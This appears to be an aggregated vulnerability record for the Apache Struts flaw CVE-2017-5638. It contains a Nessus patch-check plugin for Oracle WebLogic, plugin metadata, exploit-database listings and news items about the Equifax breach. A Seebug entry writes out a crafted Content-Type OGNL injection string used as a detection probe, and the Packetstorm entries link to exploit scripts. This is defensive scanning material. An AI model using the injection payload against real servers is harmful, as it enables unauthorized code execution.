code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(99528); script_version("1.12"); script_cvs_date("Date: 2019/11/13"); script_cve_id( "CVE-2016-1181", "CVE-2017-3506", "CVE-2017-3531", "CVE-2017-5638" ); script_bugtraq_id( 91068, 91787, 96729, 97884 ); script_xref(name:"CERT", value:"834067"); script_xref(name:"EDB-ID", value:"41570"); script_xref(name:"EDB-ID", value:"41614"); script_xref(name:"TRA", value:"TRA-2017-16"); script_xref(name:"ZDI", value:"ZDI-16-444"); script_name(english:"Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)"); script_summary(english:"Checks for the patch."); script_set_attribute(attribute:"synopsis", value: "An application server installed on the remote host is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities : - A remote code execution vulnerability exists in the Apache Struts component due to improper handling of multithreaded access to an ActionForm instance. An unauthenticated, remote attacker can exploit this, via a specially crafted multipart request, to execute arbitrary code or cause a denial of service condition. (CVE-2016-1181) - An unspecified flaw exists in the Web Services subcomponent that allows an unauthenticated, remote attacker to modify or delete arbitrary data accessible to the server. (CVE-2017-3506) - A remote code execution vulnerability exists in the Web Container subcomponent due to improper handling of reflected PartItem File requests. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2017-3531) - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)"); # http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?623d2c22"); # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?eb4db3c7"); script_set_attribute(attribute:"see_also", value:"https://support.oracle.com/rs?type=doc&id=2228898.1"); script_set_attribute(attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2017-16"); script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-16-444/"); script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html"); # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/ script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654"); script_set_attribute(attribute:"solution", value: "Apply the appropriate patch according to the April 2017 Oracle Critical Patch Update advisory."); script_set_attribute(attribute:"agent", value:"all"); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:ND"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:X"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"in_the_news", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/06/07"); script_set_attribute(attribute:"patch_publication_date", value:"2017/04/18"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/04/21"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Misc."); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("oracle_weblogic_server_installed.nbin"); script_require_keys("installed_sw/Oracle WebLogic Server"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("install_func.inc"); app_name = "Oracle WebLogic Server"; install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE); ohome = install["Oracle Home"]; subdir = install["path"]; version = install["version"]; fix = NULL; fix_ver = NULL; # individual security patches if (version =~ "^10\.3\.6\.") { fix_ver = "10.3.6.0.170418"; fix = "25388747"; } else if (version =~ "^12\.1\.3\.") { fix_ver = "12.1.3.0.170418"; fix = "25388793"; } else if (version =~ "^12\.2\.1\.0($\|[^0-9])") { fix_ver = "12.2.1.0.170418"; fix = "25388847"; } else if (version =~ "^12\.2\.1\.1($\|[^0-9])") { fix_ver = "12.2.1.1.170418"; fix = "25388843"; } else if (version =~ "^12\.2\.1\.2($\|[^0-9])") { fix_ver = "12.2.1.2.170418"; fix = "25388866"; } if (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1) { port = 0; report = '\n Oracle home : ' + ohome + '\n Install path : ' + subdir + '\n Version : ' + version + '\n Required patch : ' + fix + '\n'; security_report_v4(extra:report, port:port, severity:SECURITY_HOLE); } else audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);

NASL family	Misc.
NASL id	ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL
description	The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities : - A flaw exists in Jython due to executable classes being created with insecure permissions. A local attacker can exploit this to bypass intended access restrictions and thereby disclose sensitive information or gain elevated privileges. (CVE-2013-2027) - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638) - An unspecified flaw exists in the Web Services component that allows an unauthenticated, remote attacker to have an impact on integrity and availability. (CVE-2017-10063) - An unspecified flaw exists in the Web Container component that allows an authenticated, remote attacker to disclose sensitive information. (CVE-2017-10123) - An unspecified flaw exists in the JNDI component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-10137) - An unspecified flaw exists in the Core Components that allows an unauthenticated, remote attacker to cause a denial of service condition. (CVE-2017-10147) - An unspecified flaw exists in the Core Components that allows an unauthenticated, remote attacker to have an impact on integrity. (CVE-2017-10148) - An unspecified flaw exists in the Web Container component that allows an unauthenticated, remote attacker to have an impact on confidentiality and integrity. (CVE-2017-10178)
last seen	2020-06-01
modified	2020-06-02
plugin id	101815
published	2017-07-19
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/101815
title	Oracle WebLogic Server Multiple Vulnerabilities (July 2017 CPU)

NASL family	CGI abuses
NASL id	MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL
description	According to its self-reported version, the MySQL Enterprise Monitor application running on the remote host is 3.1.x prior to 3.1.7.8023, 3.2.x prior to 3.2.7.1204, or 3.3.x prior to 3.3.3.1199. It is, therefore, affected by multiple vulnerabilities : - A denial of service vulnerability exists in the Apache Commons component in the FileUpload functionality due to improper handling of file upload requests. An unauthenticated, remote attacker can exploit this, via a specially crafted content-type header, to cause a denial of service condition. Note that this vulnerability does not affect MySQL Enterprise Monitor versions 3.3.x. (CVE-2016-3092) - An unspecified flaw exists in the Apache Struts component that is triggered during the cleanup of action names. An unauthenticated, remote attacker can exploit this, via a specially crafted payload, to perform unspecified actions. (CVE-2016-4436) - A carry propagation error exists in the OpenSSL component in the Broadwell-specific Montgomery multiplication procedure when handling input lengths divisible by but longer than 256 bits. This can result in transient authentication and key negotiation failures or reproducible erroneous outcomes of public-key operations with specially crafted input. A man-in-the-middle attacker can possibly exploit this issue to compromise ECDH key negotiations that utilize Brainpool P-512 curves. (CVE-2016-7055) - An unspecified flaw exists in the Monitoring Server subcomponent that allows an authenticated, remote attacker to impact confidentiality and integrity. (CVE-2017-3306) - An unspecified flaw exists in the Monitoring Server subcomponent that allows an authenticated, remote attacker to impact integrity and availability. (CVE-2017-3307) - An out-of-bounds read error exists in the OpenSSL component when handling packets using the CHACHA20/POLY1305 or RC4-MD5 ciphers. An unauthenticated, remote attacker can exploit this, via specially crafted truncated packets, to cause a denial of service condition. (CVE-2017-3731) - A carry propagating error exists in the OpenSSL component in the x86_64 Montgomery squaring implementation that may cause the BN_mod_exp() function to produce incorrect results. An unauthenticated, remote attacker with sufficient resources can exploit this to obtain sensitive information regarding private keys. (CVE-2017-3732) - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)
last seen	2020-06-01
modified	2020-06-02
plugin id	99593
published	2017-04-21
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/99593
title	MySQL Enterprise Monitor 3.1.x < 3.1.7.8023 / 3.2.x < 3.2.7.1204 / 3.3.x < 3.3.3.1199 Multiple Vulnerabilities (April 2017 CPU)

Packetstorm

data source	https://packetstormsecurity.com/files/download/141630/struts2_content_type_ognl.rb.txt
id	PACKETSTORM:141630
last seen	2017-03-15
published	2017-03-14
reporter	egypt
source	https://packetstormsecurity.com/files/141630/Apache-Struts-Jakarta-Multipart-Parser-OGNL-Injection.html
title	Apache Struts Jakarta Multipart Parser OGNL Injection

data source	https://packetstormsecurity.com/files/download/141576/struntsrce.py.txt
id	PACKETSTORM:141576
last seen	2017-03-12
published	2017-03-10
reporter	anarc0der
source	https://packetstormsecurity.com/files/141576/Apache-Struts-2-2.3.x-2.5.x-Remote-Code-Execution.html
title	Apache Struts 2 2.3.x / 2.5.x Remote Code Execution

Saint

bid	96729
description	Apache Struts 2 Jakarta Multipart Parser file upload command execution
id	web_dev_struts2jakartarce
title	apache_struts2_jakarta_file_upload_command_execution
type	remote

Seebug

bulletinFamily	exploit
description	It is possible to perform a RCE attack with a malicious Content-Disposition value or with improper Content-Length header. If the Content-Dispostion / Content-Length value is not valid an exception is thrown which is then used to display an error message to a user. This is a different vector for the same vulnerability described in [S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045) (CVE-2017-5638).
id	SSV:92804
last seen	2017-11-19
modified	2017-03-21
published	2017-03-21
reporter	Root
title	S2-046: Struts 2 Remote Code Execution vulnerability（CVE-2017-5638）

bulletinFamily	exploit
description	Based on the Jakarta plugin plugin Struts remote code execution vulnerability, a malicious user can upload a file by modifying the HTTP request header Content-Type value to trigger the vulnerability, and then execute the system command. Sound detection method(the detection method by the constant company): the In to the server to issue the http request packet, modify the Content-Type field: `Content-Type:%{#context['com. opensymphony. xwork2. dispatcher. HttpServletResponse']. addHeader('vul','vul')}. multipart/form-data` Such as the return response packets in the presence of vul: the vul field entry then indicates the presence of vulnerability.
id	SSV:92746
last seen	2017-11-19
modified	2017-03-06
published	2017-03-06
reporter	Root
title	S2-045: Struts 2 Remote Code Execution vulnerability（CVE-2017-5638）

The Hacker News

id	THN:ACD3479531482E2CA5A8E15EB6B47523
last seen	2018-01-27
modified	2017-10-03
published	2017-10-02
reporter	Swati Khandelwal
source	https://thehackernews.com/2017/10/equifax-credit-security-breach.html
title	Whoops, Turns Out 2.5 Million More Americans Were Affected By Equifax Breach

id	THN:2707247140A4F620671B33D68FEB1EA9
last seen	2018-01-27
modified	2017-03-09
published	2017-03-09
reporter	Swati Khandelwal
source	https://thehackernews.com/2017/03/apache-struts-framework.html
title	New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild

id	THN:6C0E5E35ABB362C8EA341381B3DD76D6
last seen	2018-01-27
modified	2017-09-15
published	2017-09-13
reporter	Swati Khandelwal
source	https://thehackernews.com/2017/09/equifax-apache-struts.html
title	Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw

id	THN:89C2482FECD181DD37C6DAEEB7A66FA9
last seen	2018-08-23
modified	2018-08-23
published	2018-08-22
reporter	The Hacker News
source	https://thehackernews.com/2018/08/apache-struts-vulnerability.html
title	New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers

id	THN:3F47D7B66C8A65AB31FAC5823C96C34D
last seen	2018-01-27
modified	2017-09-12
published	2017-09-11
reporter	Swati Khandelwal
source	https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html
title	Apache Struts 2 Flaws Affect Multiple Cisco Products

id	THN:AF93AEDBDE6169AD1163D53979A4EA04
last seen	2018-09-20
modified	2018-09-20
published	2018-09-20
reporter	The Hacker News
source	https://thehackernews.com/2018/09/equifax-credit-reporting-breach.html
title	UK Regulator Fines Equifax £500,000 Over 2017 Data Breach